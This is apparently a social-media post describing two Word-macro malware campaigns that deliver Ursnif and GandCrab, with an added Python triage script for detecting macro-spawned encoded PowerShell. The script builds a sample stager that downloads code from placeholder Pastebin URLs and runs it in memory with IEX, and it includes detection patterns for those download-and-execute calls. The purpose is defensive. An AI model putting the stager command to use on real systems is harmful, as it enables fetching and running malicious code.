#22 - Two new malware campaigns appear that are spread through MS Word macros
Jorge Rodriguez - Ethical Hacker

Two new malware campaigns have been discovered. One distributes the Ursnif Trojan; the other spreads the same Trojan and additionally infects the target with the GandCrab ransomware.

Although the two campaigns appear to be the work of separate cybercriminal groups, there are many similarities in how they operate.

Both attacks start with an e-mail that impersonates an acquaintance of the target and carries a Microsoft Word attachment. The document contains malicious VBA macros that use PowerShell to run their payload and infect the target.

Infection of Ursnif & GandCrab:

As explained above, the Word document contains a malicious VBA macro. If the macro executes successfully, it uses PowerShell to download and run both Ursnif and GandCrab on the infected system.


The first payload is a base64-encoded PowerShell command line that checks the architecture of the target system (32- or 64-bit) and, depending on the result, downloads an additional payload from Pastebin. That payload runs in memory, without touching disk, in order to evade common antivirus products.

Finally, the payload installs a variant of the GandCrab ransomware on the victim's system, which encrypts the victim's files and holds them until the ransom is paid.
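The chain described in this section (Word spawns PowerShell, the command line is base64-encoded, the decoded script checks the architecture and pulls a second stage from Pastebin to run in memory) is what a detection engineer wants to catch at the first stage, before anything is downloaded. The following is an added triage example, not code from the article or from either campaign: it decodes the `-EncodedCommand` blob (PowerShell expects base64 over UTF-16LE) and flags the behaviours named above. The Sysmon-style events, the stage-one script and the Pastebin URLs are constructed placeholders, and the indicator patterns are assumptions chosen to match the description in the text.

```python
import base64
import re


def encode_command(script: str) -> str:
    """PowerShell's -EncodedCommand takes base64 over UTF-16LE, not ASCII."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command; raises on a malformed blob."""
    return base64.b64decode(blob).decode("utf-16-le")


def _stage_one() -> str:
    # Assumed shape of the first stage: architecture check, then an in-memory
    # download from Pastebin. The URLs are placeholders, not real samples.
    return (
        "if ([IntPtr]::Size -eq 8) { $u = 'https://pastebin.com/raw/PLACEHOLDER64' } "
        "else { $u = 'https://pastebin.com/raw/PLACEHOLDER32' }; "
        "IEX (New-Object Net.WebClient).DownloadString($u)"
    )


# Constructed Sysmon-style process-creation events (Event ID 1), reduced to the
# three fields this triage needs. The first models the macro-spawned stage
# described above; the second is a benign, scheduled PowerShell script.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_command(_stage_one()),
    },
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"powershell.exe -File C:\scripts\inventory.ps1",
    },
]

# -e, -ec, -enc and -EncodedCommand are all accepted by powershell.exe.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe")

# Each indicator corresponds to one behaviour of the chain described above.
INDICATORS = {
    "arch_check": re.compile(r"\[IntPtr\]::Size|Is64BitOperatingSystem|PROCESSOR_ARCHITECTURE", re.I),
    "pastebin_stager": re.compile(r"pastebin\.com", re.I),
    "remote_download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "in_memory_exec": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
}


def triage(event: dict) -> dict:
    """Decode an encoded PowerShell command line and report which chain
    behaviours it shows, plus whether an Office process launched it."""
    cmd = event["CommandLine"]
    script, encoded = cmd, False
    m = ENCODED_RE.search(cmd)
    if m:
        try:
            script = decode_command(m.group(1))
            encoded = True
        except (ValueError, UnicodeDecodeError):
            pass  # malformed blob: fall back to matching the raw command line
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(script))
    office_parent = event["ParentImage"].lower().endswith(OFFICE_PARENTS)
    return {
        "encoded": encoded,
        "office_parent": office_parent,
        "indicators": hits,
        # An Office parent plus any chain indicator is the pattern in the text;
        # treat that combination as an alert rather than merely suspicious.
        "alert": office_parent and bool(hits),
        "script": script,
    }


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        r = triage(ev)
        print(f"alert={r['alert']} office_parent={r['office_parent']} indicators={r['indicators']}")
```

The decoded script is returned alongside the verdict so an analyst can read the actual stager rather than the opaque blob; on real telemetry the same function can be run over every `powershell.exe` creation whose parent is an Office binary.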


Ursnif infection:

Like the campaign above, it uses VBA macros in a malicious Word document to start the infection.

In this case, once it is running, the malware collects system information, packs it into a CAB file and sends it to its C&C server over an HTTPS connection.

block macros by default ??

Václav Sinkule

APS consultant and project manager @Aimtec / Growth mindset and grit enthusiast

6 years ago

Thank you for sharing, Jorge Rodriguez!
